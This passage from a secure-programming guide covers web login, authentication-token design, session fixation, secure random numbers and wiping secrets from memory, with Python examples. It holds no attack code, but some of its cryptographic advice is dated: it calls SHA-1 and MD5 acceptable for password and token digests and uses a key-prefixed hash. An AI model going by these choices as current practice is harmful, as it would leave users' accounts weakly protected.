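    """Return the value for a Set-Cookie header carrying the token."""
    cookie = SimpleCookie()
    cookie["auth"] = token
    cookie["auth"]["httponly"] = True   # hide the cookie from browser scripts
    cookie["auth"]["secure"] = True     # only send it over encrypted connections
    cookie["auth"]["path"] = "/"
    return cookie["auth"].OutputString()


if __name__ == "__main__":
    print("Set-Cookie: " + build_auth_cookie("abc123"))
```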
|
||
|
||
<para>
|
||
Fu [2001] discusses client authentication on the web, along with a
|
||
suggested approach, and this is the approach I suggest for most sites.
|
||
The basic idea is that client authentication is split into two parts,
|
||
a ``login procedure'' and ``subsequent requests.''
|
||
In the login procedure, the server asks for the user's username and password,
|
||
the user provides them, and the server replies with an
|
||
``authentication token''.
|
||
In the subsequent requests, the client (web browser)
|
||
sends the authentication token
|
||
to the server (along with its request); the server verifies that the
|
||
token is valid, and if it is, services the request.
|
||
Another good source of information about web authentication is
|
||
Seifried [2001].
|
||
</para>
|
||
|
||
<para>
|
||
One serious problem with some web authentication techniques is that
|
||
they are vulnerable to a problem called "session fixation".
|
||
In a session fixation attack, the attacker fixes the user's session ID
|
||
before the user even logs into the target server, thus eliminating the
|
||
need to obtain the user's session ID afterwards.
|
||
Basically, the attacker obtains an account, and then tricks another
|
||
user into using the attacker's account - often by creating a special
|
||
hypertext link and tricking the user into clicking on it.
|
||
A good paper describing session fixation is the paper by
|
||
<ulink url="http://www.acros.si/papers/session_fixation.pdf">
|
||
Mitja Kolsek [2002]</ulink>.
|
||
A web authentication system you use should be resistant to session fixation.
|
||
</para>
|
||
|
||
<sect2 id="web-authentication-login">
|
||
<title>Authenticating on the Web: Logging In</title>
|
||
<para>
|
||
The login procedure is typically implemented as an HTML form;
|
||
I suggest using the field names ``username'' and ``password'' so that
|
||
web browsers can automatically perform some useful actions.
|
||
Make sure that the password is sent over an encrypted connection
|
||
(using SSL or TLS, through an https: connection) - otherwise, eavesdroppers
|
||
could collect the password.
|
||
Make sure all password text fields are marked as passwords in the HTML,
|
||
so that the password text is not visible to
|
||
anyone who can see the user's screen.
|
||
</para>
|
||
|
||
<para>
|
||
If both the username and password fields are filled in,
|
||
do not try to automatically log in as that user.
|
||
Instead, display the login form with the user and password fields;
|
||
this lets the user verify that they really want to log in as that user.
|
||
If you fail to do this, attackers will be able to exploit this weakness to
|
||
perform a session fixation attack.
|
||
Paranoid systems might want to simply ignore the password field and make the
|
||
user fill it in, but this interferes with browsers which can store
|
||
passwords for users.
|
||
</para>
|
||
|
||
<para>
|
||
When the user sends a username and password, they must be checked against
|
||
the user account database.
|
||
This database shouldn't store the passwords ``in the clear'', since if
|
||
someone got a copy of this database they'd suddenly get everyone's
|
||
password (and users often reuse passwords).
|
||
Some use crypt() to handle this, but crypt can only handle a small
|
||
input, so I recommend using a different approach (this is my approach -
|
||
Fu [2001] doesn't discuss this).
|
||
Instead, the user database should store a username, salt, and
|
||
the password hash for that user.
|
||
The ``salt'' is just a random sequence of characters, used to make it
|
||
harder for attackers to determine a password even if they get the
|
||
password database - I suggest an 8-character random sequence.
|
||
It doesn't need to be cryptographically random, just different from
|
||
the salts of other users.
|
||
The password hash should be computed by concatenating
|
||
``server key1'', the user's password, and the salt, and
|
||
then running a cryptographically secure hash algorithm.
|
||
Server key1 is a secret key unique to this server - keep it separate
|
||
from the password database.
|
||
Someone who has server key1 could then run programs to crack user
|
||
passwords if they also had the password database;
|
||
since it doesn't need to be memorized, it can be a long and complex
|
||
password.
|
||
Most secure would be HMAC-SHA-1 or HMAC-MD5;
|
||
you could use SHA-1 (most web sites aren't really worried about
|
||
the attacks it allows) or MD5 (but MD5 would be a poorer choice;
|
||
see the discussion about MD5).
|
||
</para>
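<para>
A minimal sketch of the stored record described above follows.
It keys the hash with server key1 and covers the password and salt;
note that it substitutes HMAC-SHA-256 for the HMAC-SHA-1 and HMAC-MD5
options named in the text, and that the function names are hypothetical.
Many current systems prefer a deliberately slow password-hashing function
for this job, so treat this as an illustration of the structure only.
</para>

```python
import hashlib
import hmac
import secrets
import string

SALT_ALPHABET = string.ascii_letters + string.digits


def new_salt(length=8):
    """An 8-character random salt, as suggested in the text."""
    return "".join(secrets.choice(SALT_ALPHABET) for _ in range(length))


def password_hash(server_key1, password, salt):
    """Keyed hash over the password and salt, keyed with server key1 (bytes)."""
    message = (password + salt).encode("utf-8")
    return hmac.new(server_key1, message, hashlib.sha256).hexdigest()


def new_user_record(server_key1, username, password):
    """The three values the user database stores: username, salt, hash."""
    salt = new_salt()
    return {"username": username, "salt": salt,
            "hash": password_hash(server_key1, password, salt)}


if __name__ == "__main__":
    key1 = secrets.token_bytes(32)  # keep this apart from the password database
    print(new_user_record(key1, "fred", "example password"))
```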
|
||
|
||
<para>
|
||
Thus, when users create their accounts, the password is hashed and
|
||
placed in the password database.
|
||
When users try to log in, the purported password is hashed and compared
|
||
against the hash in the database (they must be equal).
|
||
When users change their password, they should type in both the old
|
||
and new password, and the new password twice (to make sure they didn't
|
||
mistype it); and again, make sure none of these passwords' characters
|
||
are visible on the screen.
|
||
</para>
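<para>
The account creation, login, and password change steps above might be
sketched like this.
The in-memory dictionary stands in for the real user database, the key is
generated on the spot only so the example runs, and all names are
hypothetical; HMAC-SHA-256 is again an assumption of the sketch.
</para>

```python
import hashlib
import hmac
import secrets

SERVER_KEY1 = secrets.token_bytes(32)  # hypothetical; load from protected storage
users = {}                             # username -> (salt, hash); stand-in database


def _hash(password, salt):
    message = (password + salt).encode("utf-8")
    return hmac.new(SERVER_KEY1, message, hashlib.sha256).hexdigest()


def create_account(username, password):
    salt = secrets.token_hex(4)        # 8 hexadecimal characters
    users[username] = (salt, _hash(password, salt))


def check_login(username, purported_password):
    """Hash the purported password and compare it with the stored hash."""
    if username not in users:
        return False
    salt, stored = users[username]
    return hmac.compare_digest(stored, _hash(purported_password, salt))


def change_password(username, old_password, new_password, new_password_again):
    """Require the old password, and the new password typed twice."""
    if new_password != new_password_again:
        return False
    if not check_login(username, old_password):
        return False
    create_account(username, new_password)
    return True
```

<para>
The comparison uses hmac.compare_digest so that the time taken does not
reveal how many leading characters of the hash matched.
</para>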
|
||
|
||
<para>
|
||
By default, don't save the passwords themselves on the client's
|
||
web browser using cookies - users may sometimes use shared clients
|
||
(say at some coffee shop).
|
||
If you want, you can give users the option of ``saving the password''
|
||
on their browser, but if you do, make sure that the password is set to
|
||
only be transmitted on ``secure'' connections, and make sure the user has
|
||
to specifically request it (don't do this by default).
|
||
</para>
|
||
|
||
<para>
|
||
Make sure that the page is marked to not be cached, or a proxy
|
||
server might re-serve that page to other users.
|
||
</para>
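<para>
One way to mark a page as not cacheable is to send the response headers
below.
This is a small sketch; the function name is hypothetical, and how the
headers are attached to a response depends on the web framework in use.
</para>

```python
def no_cache_headers():
    """Response headers asking browsers and proxies not to store the page."""
    return [
        ("Cache-Control", "no-store"),  # HTTP/1.1 caches
        ("Pragma", "no-cache"),         # older HTTP/1.0 caches
        ("Expires", "0"),               # treat the page as already expired
    ]


if __name__ == "__main__":
    for name, value in no_cache_headers():
        print(name + ": " + value)
```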
|
||
|
||
<para>
|
||
Once a user successfully logs in, the server needs to send the client
|
||
an ``authentication token'' in a cookie, which is described next.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="web-authentication-subsequent">
|
||
<title>Authenticating on the Web: Subsequent Actions</title>
|
||
<para>
|
||
Once a user logs in, the server sends back to the client a cookie
|
||
with an authentication token that will be used from then on.
|
||
A separate authentication token is used, so that users don't need to keep
|
||
logging in, so that passwords aren't continually sent back and forth, and
|
||
so that unencrypted communication can be used if desired.
|
||
A suggested token (ignoring session fixation attacks) would look like this:
|
||
<programlisting>
|
||
exp=t&data=s&digest=m
|
||
</programlisting>
|
||
Where t is the expiration time of the token (say, in several hours),
|
||
and data s identifies the user (say, the user name or session id).
|
||
The digest is a keyed digest of the other fields.
|
||
Feel free to change the field name of ``data'' to be more descriptive
|
||
(e.g., username and/or sessionid).
|
||
If you have more than one field of data (e.g., both a username and a
|
||
sessionid), make sure the digest uses both the field names and data values
|
||
of all fields you're authenticating; concatenate them with a pattern
|
||
(say ``%%'', ``+'', or ``&'')
|
||
that can't occur in any of the field data values.
|
||
As described in a moment, it would be a good idea to include a username.
|
||
The keyed digest should be a cryptographic hash of the other information in
|
||
the token, keyed using a different server key2.
|
||
The keyed digest should use HMAC-MD5 or HMAC-SHA1, using a different server
|
||
key (key2), though simply using SHA1 might be okay for some purposes
|
||
(or even MD5, if the risks are low).
|
||
Key2 is subject to brute force guessing attacks, so it should be
|
||
long (say 12+ characters) and unguessable; it does NOT need to be easily
|
||
remembered.
|
||
If this key2 is compromised, anyone can authenticate to the server, but
|
||
it's easy to change key2 - when you do, it'll simply force currently
|
||
``logged in'' users to re-authenticate.
|
||
See Fu [2001] for more details.
|
||
</para>
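<para>
Building a token of this form could look like the sketch below, which uses
HMAC-SHA1 keyed with server key2.
The function name is hypothetical and the key shown is only an example
value, not something to reuse.
</para>

```python
import hashlib
import hmac


def make_token(exp, data, key2):
    """Build exp=t&data=s&digest=m, where m is an HMAC-SHA1 of the other fields."""
    for value in (exp, data):
        # The separator must not be able to occur inside a field value.
        if "&" in value or "=" in value:
            raise ValueError("field value contains a separator character")
    body = "exp=" + exp + "&data=" + data
    digest = hmac.new(key2, body.encode("utf-8"), hashlib.sha1).hexdigest()
    return body + "&digest=" + digest


if __name__ == "__main__":
    key2 = b"an example key, long and hard to guess"
    print(make_token("2002-12-30T1800", "fred", key2))
```

<para>
Because the digest covers both the field names and the field values, a
client cannot alter the expiration time or the user name without
invalidating the token.
</para>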
|
||
|
||
<para>
|
||
There is a potential weakness in this approach.
|
||
I have concerns that Fu's approach, as originally described, is weak against
|
||
session fixation attacks (from several different directions, which
|
||
I don't want to get into here).
|
||
Thus, I now suggest modifying Fu's approach and using this token format
|
||
instead:
|
||
<programlisting>
|
||
exp=t&data=s&client=c&digest=m
|
||
</programlisting>
|
||
This is the same as the original Fu approach except for one addition;
older versions of this book (before December 2002) didn't suggest it.
The modification adds a new
"client" field to uniquely identify the client's current location/identity.
|
||
The data in the client field should be something that should change
|
||
if someone else tries to use the account; ideally, its new value should be
|
||
unguessable, though that's hard to accomplish in practice.
|
||
Ideally the client field would be the client's SSL client certificate,
|
||
but currently that's a suggestion that is hard to meet.
|
||
At the least, it should be the user's IP address (as perceived from
|
||
the server, and remember to plan for IPv6's longer addresses).
|
||
This modification doesn't completely counter session fixation attacks,
|
||
unfortunately (since if an attacker can determine what the user
|
||
would send, the attacker may be able to make a request to a server
|
||
and convince the client to accept those values).
|
||
However, it does add resistance to the attack.
|
||
Again, the digest must now include all the other data.
|
||
</para>
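<para>
The following sketch shows a token with the added client field and a check
that ties the token to the address the server sees.
It assumes the client field holds the IP address and uses HMAC-SHA1;
the function names are hypothetical, and the expiration check is left out
here to keep the example short.
</para>

```python
import hashlib
import hmac


def make_token(exp, data, client, key2):
    """Build exp=t&data=s&client=c&digest=m with the digest over all fields."""
    for value in (exp, data, client):
        if "&" in value or "=" in value:
            raise ValueError("field value contains a separator character")
    body = "exp=%s&data=%s&client=%s" % (exp, data, client)
    digest = hmac.new(key2, body.encode("utf-8"), hashlib.sha1).hexdigest()
    return body + "&digest=" + digest


def verify_token(token, request_ip, key2):
    """Accept only an unmodified token presented from the recorded address."""
    body, sep, digest = token.rpartition("&digest=")
    if not sep:
        return False
    expected = hmac.new(key2, body.encode("utf-8"), hashlib.sha1).hexdigest()
    if not hmac.compare_digest(expected.encode("ascii"), digest.encode("utf-8")):
        return False
    # The digest matched, so the fields are the ones this server issued.
    fields = dict(part.split("=", 1) for part in body.split("&") if "=" in part)
    return fields.get("client") == request_ip
```

<para>
A token copied to another machine then fails verification unless the
attacker can also appear to come from the same address.
</para>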
|
||
|
||
<para>
|
||
Here's an example.
|
||
If a user logs into foobar.com successfully, you might establish
|
||
the expiration date as 2002-12-30T1800 (let's assume we'll transmit as
|
||
ASCII text in this format for the moment), the username as "fred",
|
||
the client session as "1234", and you might determine that the
|
||
client's IP address was 5.6.7.8.
|
||
If you use a simple SHA-1 keyed digest
|
||
(and use a key prefixing the rest of the data), with the server key2 value of
|
||
"rM!V^m~v*Dzx", the digest could be computed over:
|
||
<programlisting>
|
||
exp=2002-12-30T1800&user=fred&session=1234&client=5.6.7.8
|
||
</programlisting>
|
||
A keyed digest can be computed by running a cryptographic hash function
|
||
over, say, the server key2, then the data;
|
||
in this case, the digest would be:
|
||
<programlisting>
|
||
101cebfcc6ff86bc483e0538f616e9f5e9894d94
|
||
</programlisting>
|
||
</para>
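<para>
The key-prefixed computation in this example can be sketched as below.
Whether it reproduces the exact digest printed above depends on byte-level
details the text doesn't spell out (for example, any separator or trailing
newline), so no output is claimed here.
Note also that a plain hash over ``key, then data'' can be open to
length-extension attacks, which is one reason HMAC is the preferred
construction.
</para>

```python
import hashlib


def key_prefixed_sha1(key2, data):
    """SHA-1 over server key2 followed directly by the data (both bytes)."""
    return hashlib.sha1(key2 + data).hexdigest()


if __name__ == "__main__":
    key2 = b"rM!V^m~v*Dzx"
    data = b"exp=2002-12-30T1800&user=fred&session=1234&client=5.6.7.8"
    print(key_prefixed_sha1(key2, data))
```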
|
||
|
||
<para>
|
||
From then on, the server must check the expiration time and recompute the
|
||
digest of this authentication token, and only accept client requests
|
||
if the digest is correct.
|
||
If there's no token, the server should reply with the user login page
|
||
(with a hidden form field to show where the successful login should go
|
||
afterwards).
|
||
</para>
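<para>
The per-request check might be sketched as follows.
It assumes the expiration field uses the ASCII format shown earlier
(such as 2002-12-30T1800) interpreted as UTC, and that the digest is an
HMAC-SHA1 over everything before the digest field; the function names and
return values are hypothetical.
</para>

```python
import hashlib
import hmac
from datetime import datetime

EXP_FORMAT = "%Y-%m-%dT%H%M"  # e.g. 2002-12-30T1800, taken to be UTC


def token_is_valid(token, key2, now):
    """Recompute the digest, then check the expiration time against 'now'."""
    if not token:
        return False
    body, sep, digest = token.rpartition("&digest=")
    if not sep:
        return False
    expected = hmac.new(key2, body.encode("utf-8"), hashlib.sha1).hexdigest()
    if not hmac.compare_digest(expected.encode("ascii"), digest.encode("utf-8")):
        return False
    fields = dict(part.split("=", 1) for part in body.split("&") if "=" in part)
    try:
        expires = datetime.strptime(fields.get("exp", ""), EXP_FORMAT)
    except ValueError:
        return False
    return now < expires


def handle_request(token, key2, now, requested_page):
    """Serve the page, or send the login form that remembers where to go next."""
    if token_is_valid(token, key2, now):
        return ("serve", requested_page)
    return ("login", requested_page)  # the page goes into a hidden form field
```

<para>
The digest is checked before any field is trusted, so a forged expiration
time is rejected without ever being parsed.
</para>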
|
||
|
||
<para>
|
||
It would be prudent to display the username, especially on important
|
||
screens, to help counter session fixation attacks.
|
||
If users are given feedback on their username, they may notice if they
|
||
don't have their expected username. This is helpful anyway if it's
|
||
possible to have an unexpected username (e.g., a family that shares the
|
||
same machine).
|
||
Examples of important screens include those when a file is uploaded
|
||
that should be kept private.
|
||
</para>
|
||
|
||
<para>
|
||
One odd implementation issue: although the specifications for the
|
||
"Expires:" (expiration time) field for cookies
|
||
permit time zones, it turns out that some versions of
|
||
Microsoft's Internet Explorer don't implement time zones correctly
|
||
for cookie expiration.
|
||
Thus, you need to always use UTC time (also called Zulu time)
|
||
in cookie expiration times for maximum portability.
|
||
<!-- http://lwn.net/Articles/11981/ -->
|
||
It's a good idea in general to use UTC time for time values,
|
||
and convert when necessary for human display, since this eliminates other
|
||
time zone and daylight savings time issues.
|
||
</para>
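<para>
As an illustration, Python's standard library can produce an expiration
time that is always expressed in UTC.
The function name is hypothetical; the inputs are taken to be a UTC
date and time.
</para>

```python
import calendar
from email.utils import formatdate


def cookie_expires_utc(year, month, day, hour, minute):
    """Format a UTC date and time for a cookie expiration, ending in 'GMT'."""
    seconds = calendar.timegm((year, month, day, hour, minute, 0, 0, 0, 0))
    return formatdate(seconds, usegmt=True)


if __name__ == "__main__":
    print(cookie_expires_utc(2002, 12, 30, 18, 0))
```

<para>
Working from seconds since the epoch, rather than from local time, avoids
any dependence on the server's own time zone setting.
</para>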
|
||
|
||
<para>
|
||
If you include a sessionid in the authentication token, you can limit
|
||
access further.
|
||
Your server could ``track'' what pages a user has seen in a given session,
|
||
and only permit access to other appropriate pages from that point
|
||
(e.g., only those directly linked from those page(s)).
|
||
For example,
|
||
if a user is granted access to page foo.html, and page foo.html has
|
||
pointers to resources bar1.jpg and bar2.png, then accesses to bar4.cgi
|
||
can be rejected.
|
||
You could even kill the session, though only do this if the authentication
|
||
information is valid (otherwise, this would make it possible for
|
||
attackers to cause denial-of-service attacks on other users).
|
||
This would somewhat limit the access an attacker has, even if they
|
||
successfully hijack a session, though clearly an attacker with time
|
||
and an authentication token
|
||
could ``walk'' the links just as a normal user would.
|
||
</para>
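<para>
The page-tracking idea above could be sketched like this.
The link table and class name are hypothetical; a real server would derive
the links from the pages it actually serves and would keep one tracker per
sessionid.
</para>

```python
# Hypothetical site map: page -> resources that page links to.
LINKS = {"foo.html": {"bar1.jpg", "bar2.png"}}


class SessionTracker:
    """Remember what a session has seen and allow only linked resources."""

    def __init__(self, entry_pages):
        self.allowed = set(entry_pages)

    def request(self, resource):
        if resource not in self.allowed:
            return False
        # Serving a page makes everything it links to reachable.
        self.allowed |= LINKS.get(resource, set())
        return True


if __name__ == "__main__":
    session = SessionTracker({"foo.html"})
    for resource in ("foo.html", "bar1.jpg", "bar4.cgi"):
        print(resource, session.request(resource))
```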
|
||
|
||
<para>
|
||
One decision is whether or not to require the authentication token and/or
|
||
data to be sent over a secure connection (e.g., SSL).
|
||
If you send an authentication token
|
||
in the clear (non-secure), someone who intercepts the
|
||
token could do whatever the user could do until the expiration time.
|
||
Also, when you send data over an unencrypted link, there's the risk of
|
||
unnoticed change by an attacker; if you're worried that someone might change the
|
||
data on the way, then you need to authenticate the data being transmitted.
|
||
Encryption by itself doesn't guarantee authentication, but it does make
|
||
corruption more likely to be detected, and typical libraries can support
|
||
both encryption and authentication in a TLS/SSL connection.
|
||
In general, if you're encrypting a message, you should also authenticate it.
|
||
If your needs vary,
|
||
one alternative is to create two authentication tokens - one is used
|
||
only in a ``secure'' connection for important operations, while the other
|
||
is used for less-critical operations.
|
||
Make sure the token used for ``secure'' connections is marked so that only
|
||
secure connections (typically encrypted SSL/TLS connections) are used.
|
||
If users aren't really different, the authentication token could omit
|
||
the ``data'' entirely.
|
||
</para>
|
||
|
||
<para>
|
||
Again, make sure that the pages with this authentication token aren't cached.
|
||
There are other reasonable schemes also; the goal of this text is
|
||
to provide at least one secure solution.
|
||
Many variations are possible.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="web-authentication-logout">
|
||
<title>Authenticating on the Web: Logging Out</title>
|
||
<para>
|
||
You should always provide users with a mechanism to ``log out'' - this
|
||
is especially helpful for customers using shared browsers
|
||
(say at a library).
|
||
Your ``logout'' routine's task is simple - just unset the client's
|
||
authentication token.
|
||
</para>
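<para>
Unsetting the token usually means sending the cookie again with an empty
value and an expiration in the past.
Here is a minimal sketch with Python's http.cookies module; the cookie name
``auth'' and the path are assumptions, and they need to match whatever was
used when the cookie was set.
</para>

```python
from http.cookies import SimpleCookie


def build_logout_cookie(name="auth"):
    """Return a Set-Cookie value that makes the browser discard the token."""
    cookie = SimpleCookie()
    cookie[name] = ""
    cookie[name]["path"] = "/"
    cookie[name]["max-age"] = 0
    cookie[name]["expires"] = "Thu, 01 Jan 1970 00:00:00 GMT"
    return cookie[name].OutputString()


if __name__ == "__main__":
    print("Set-Cookie: " + build_logout_cookie())
```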
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="random-numbers">
|
||
<title>Random Numbers</title>
|
||
|
||
<para>
|
||
In many cases secure programs must generate ``random'' numbers that
|
||
cannot be guessed by an adversary.
|
||
Examples include session keys, public or private keys, symmetric keys,
|
||
nonces and IVs used in many protocols, salts, and so on.
|
||
Ideally, you should use a truly random source of data for random numbers,
|
||
such as values based on
|
||
radioactive decay (through precise timing of Geiger counter
|
||
clicks), atmospheric noise, or thermal noise in electrical circuits.
|
||
Some computers have a hardware component that functions as
|
||
a real random value generator, and if it's available you should use it.
|
||
</para>
|
||
|
||
<para>
|
||
However, most computers don't have hardware that generates truly
|
||
random values, so in most cases you need a way to generate random numbers
|
||
that is sufficiently random that an adversary can't predict it.
|
||
In general, this means that you'll need three things:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
An ``unguessable'' state; typically this is done by measuring
|
||
variances in timing of low-level devices
|
||
(keystrokes, disk drive arm jitter, etc.)
|
||
in a way that an adversary cannot control.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
A cryptographically strong pseudo-random number generator (PRNG), which
|
||
uses the state to generate ``random'' numbers.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
A large number of bits (in both the seed and the resulting value used).
|
||
There's no point in having a strong PRNG if you only have a few possible values,
|
||
because this makes it easy for an attacker to use brute force attacks.
|
||
The number of bits necessary varies depending on the circumstance; however,
|
||
since these are often used as cryptographic keys, the normal rules of
|
||
thumb for keys apply.
|
||
For a symmetric key (result), I'd use at least 112 bits (3DES), 128 bits is
|
||
a little better, and 160 bits or more is even safer.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
Typically the PRNG uses the state to generate some values, and then
|
||
some of its values and other unguessable inputs are used to update the state.
|
||
There are lots of ways to attack these systems.
|
||
For example, if an attacker can control or view inputs to the state
|
||
(or parts of it), the attacker may be able
|
||
to determine your supposedly ``random'' number.
|
||
</para>
|
||
|
||
<para>
|
||
A real danger with PRNGs is that most computer language libraries include
|
||
a large set of pseudo-random number generators (PRNGs)
|
||
which are <emphasis>inappropriate</emphasis> for security purposes.
|
||
Let me say it again:
|
||
<emphasis>do not use typical random number generators for security
|
||
purposes</emphasis>.
|
||
Typical library PRNGs
|
||
are intended for use in simulations, games, and so on; they are
|
||
<emphasis remap="it">not</emphasis> sufficiently random for use
|
||
in security functions such as key generation.
|
||
Most non-cryptographic
|
||
library PRNGs are some variation of ``linear congruential generators'',
|
||
where the ``next'' random value is computed as "(aX+b) mod m"
|
||
(where X is the previous value).
|
||
Good linear congruential generators are fast and have useful statistical
|
||
properties, making them appropriate for their intended uses.
|
||
The problem with such PRNGs is that future values can be easily deduced
|
||
by an attacker (though they may appear random).
|
||
Other algorithms for generating random numbers quickly, such as
|
||
quadratic generators and cubic generators, have also been broken
|
||
[Schneier 1996].
|
||
In short, you have to use cryptographically strong PRNGs to
|
||
generate random numbers in secure applications - ordinary random number
|
||
libraries are not sufficient.
|
||
</para>
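<para>
To make the predictability concrete, here is a minimal sketch of a
linear congruential generator and of an attacker who sees one output.
The constants and the seed are illustrative assumptions, not values taken
from any particular library, and the sketch assumes the generator hands out
its whole internal state (generators that reveal only part of the state
take more work to predict, but not enough to make them safe).
</para>

```python
# Illustrative LCG constants (assumed for this sketch; not from the text).
A = 1103515245
B = 12345
M = 2**31


def lcg_next(x):
    """Return the next value of the generator: (aX + b) mod m."""
    return (A * x + B) % M


# The "victim" seeds the generator with a value it believes is secret.
secret_seed = 20030303
token_1 = lcg_next(secret_seed)  # a value the attacker gets to observe
token_2 = lcg_next(token_1)      # the value the victim hands out next

# The attacker never sees the seed, yet one observed output is enough
# to compute every later value.
predicted = lcg_next(token_1)
print(predicted == token_2)
```

<para>
Nothing in the attack depends on guessing the seed; knowing the
algorithm and one output is sufficient.
</para>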
|
||
|
||
<para>
|
||
Failing to correctly generate truly random values for keys has caused
|
||
a number of problems, including holes in Kerberos,
|
||
the X window system, and NFS [Venema 1996].
|
||
</para>
|
||
|
||
<para>
|
||
If possible, you should use system services
|
||
(typically provided by the operating system) that are expressly designed
|
||
to create cryptographically secure random values.
|
||
For example,
|
||
the Linux kernel (since 1.3.30) includes a random number generator, which
|
||
is sufficient for many security purposes.
|
||
This random number generator gathers environmental noise
|
||
from device drivers and other sources into an entropy pool.
|
||
When accessed as /dev/random, random bytes are only returned
|
||
within the estimated number of bits of noise in the entropy pool
|
||
(when the entropy pool is empty, the call blocks until additional
|
||
environmental noise is gathered).
|
||
When accessed as /dev/urandom, as many bytes as are requested are
|
||
returned even when the entropy pool is exhausted.
|
||
If you are using the random values for cryptographic purposes (e.g.,
|
||
to generate a key) on Linux, use /dev/random.
|
||
*BSD systems also include /dev/random.
|
||
Solaris users with the SUNWski package also have /dev/random.
|
||
Note that if a hardware random number generator is available and its
|
||
driver is installed, it will be used instead.
|
||
More information is available in the system documentation random(4).
|
||
</para>
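<para>
As a rough sketch of ``use the system service'' in practice, the following
asks the operating system for key material through Python's standard
secrets module instead of a general-purpose library PRNG.
The names new_key and KEY_BYTES are hypothetical, and exactly which kernel
interface the module reads (and whether it can block) depends on the
platform and Python version, so treat that as an assumption to check
against your own system's documentation.
</para>

```python
import secrets

KEY_BYTES = 16  # 128 bits; an assumed size for this sketch


def new_key(nbytes=KEY_BYTES):
    """Return nbytes of random data from the operating system's generator."""
    return secrets.token_bytes(nbytes)


session_key = new_key()
nonce = secrets.token_hex(16)  # 16 random bytes, written as 32 hex digits
print(len(session_key), len(nonce))
```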
|
||
|
||
<para>
|
||
On other systems, you'll need to find another way to get truly random results.
|
||
One possibility for other Unix-like systems
|
||
is the Entropy Gathering Daemon (EGD), which monitors system
|
||
activity and hashes it into random values; you can get it at
|
||
<ulink url="http://www.lothar.com/tech/crypto">http://www.lothar.com/tech/crypto</ulink>.
|
||
You might consider using a
|
||
cryptographic hash function (e.g., SHA-1) on PRNG outputs.
|
||
By using a hash algorithm, even if the PRNG turns out to be guessable,
|
||
this means that the attacker must now also break the hash function.
|
||
</para>
|
||
|
||
<para>
|
||
If you have to implement a strong PRNG yourself,
|
||
a good choice for a cryptographically strong (and patent-unencumbered)
|
||
PRNG is the Yarrow algorithm; you can learn more about Yarrow from
|
||
<ulink url="http://www.counterpane.com/yarrow.html">http://www.counterpane.com/yarrow.html</ulink>.
|
||
Some other PRNGs can be useful, but many widely-used ones
|
||
have known weaknesses that may or may not matter depending on your application.
|
||
Before implementing a PRNG yourself, consult the literature, such as
|
||
[Kelsey 1998] and [McGraw 2000a].
|
||
You should also examine
|
||
<ulink url="http://www.ietf.org/rfc/rfc1750.txt">IETF RFC 1750</ulink>.
|
||
NIST has some useful information; see the
|
||
<ulink url="http://csrc.nist.gov/publications/nistpubs/800-22/sp-800-22-051501.pdf">NIST publication 800-22</ulink> and
|
||
<ulink url="http://csrc.nist.gov/publications/nistpubs/800-22/errata-sheet.pdf">NIST errata</ulink>.
|
||
You should know about the
|
||
<ulink url="http://stat.fsu.edu/~geo/diehard.html">diehard tests</ulink> too.
|
||
You might want to examine
|
||
the paper titled
|
||
<!-- http://www.cryptonomicon.net/links.php?op=visit&lid=406 -->
|
||
"how Intel checked its PRNG", but unfortunately that paper appears to be
|
||
unavailable now.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="protect-secrets">
|
||
<title>Specially Protect Secrets (Passwords and Keys) in User Memory</title>
|
||
<para>
|
||
If your application must handle passwords or non-public keys
|
||
(such as session keys, private keys, or secret keys), try to hide them
|
||
and overwrite them immediately after using them so they have minimal exposure.
|
||
</para>
|
||
|
||
<para>
|
||
Systems such as Linux support the mlock() and mlockall() calls to
|
||
keep memory from being paged to disk (since someone might acquire the
|
||
key later from the swap file).
|
||
Note that on Linux this is a privileged system call, which causes its
|
||
own issues (do I grant the program superuser privileges so it can call
|
||
mlock, if it doesn't need them otherwise?).
|
||
</para>
|
||
|
||
<para>
|
||
Also, if your program handles such secret values, be sure to disable creating
|
||
core dumps (via ulimit). Otherwise, an attacker may be able to halt the
|
||
program and find the secret value in the data dump.
|
||
</para>
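<para>
Besides the shell's ulimit, a program can lower the limit for itself
before it ever touches a secret.
The sketch below does this with Python's standard resource module on a
Unix-like system; disable_core_dumps is a hypothetical helper name.
</para>

```python
import resource


def disable_core_dumps():
    """Set both the soft and hard core-file size limits to zero."""
    resource.setrlimit(resource.RLIMIT_CORE, (0, 0))


disable_core_dumps()
soft, hard = resource.getrlimit(resource.RLIMIT_CORE)
print(soft, hard)
```

<para>
Because the hard limit is lowered too, an unprivileged process cannot
raise it again later.
</para>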
|
||
|
||
<para>
|
||
Beware - normally processes can monitor other processes through
|
||
the calls for debuggers (e.g., via ptrace(2) and the /proc pseudo-filesystem)
|
||
[Venema 1996].
|
||
Kernels usually protect against these monitoring routines if the process is
|
||
setuid or setgid
|
||
(on the few ancient ones that don't, there really isn't a good way to
|
||
defend yourself other than upgrading).
|
||
Thus, if your process manages secret values, you probably should make it
|
||
setgid or setuid (to a different unprivileged group or user) to forcibly
|
||
inhibit this kind of monitoring.
|
||
Unless you need it to be setuid, use setgid (since this grants fewer
|
||
privileges).
|
||
</para>
|
||
|
||
|
||
<para>
|
||
Then there's the problem of being able to actually overwrite the value, which
|
||
often becomes language and compiler specific.
|
||
In many languages, you need to make sure that you store
|
||
such information in mutable locations, and then overwrite those locations.
|
||
For example,
|
||
in Java, don't use the type String to store a password because Strings are
|
||
immutable (they will not be overwritten until garbage-collected and
|
||
then reused, possibly far in the future).
|
||
Instead, in Java use char[] to store a password, so it can be
|
||
immediately overwritten.
|
||
In Ada, use type String (an array of characters),
|
||
and not type Unbounded_String, to make sure
|
||
that you have control over the contents.
|
||
</para>
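<para>
The same ``mutable location'' idea can be sketched in Python, where
str and bytes are immutable but bytearray is not.
The function check_password is a hypothetical stand-in for whatever
really consumes the secret.
This only clears the one buffer you control; copies made by other code or
by the interpreter are not touched, so it reduces exposure rather than
eliminating it.
</para>

```python
def wipe(buf):
    """Overwrite every byte of a mutable buffer with zero, in place."""
    for i in range(len(buf)):
        buf[i] = 0


def check_password(candidate):
    """Hypothetical stand-in for the real use of the secret."""
    return len(candidate) > 0


password = bytearray(b"correct horse")  # mutable, unlike str or bytes
try:
    ok = check_password(password)
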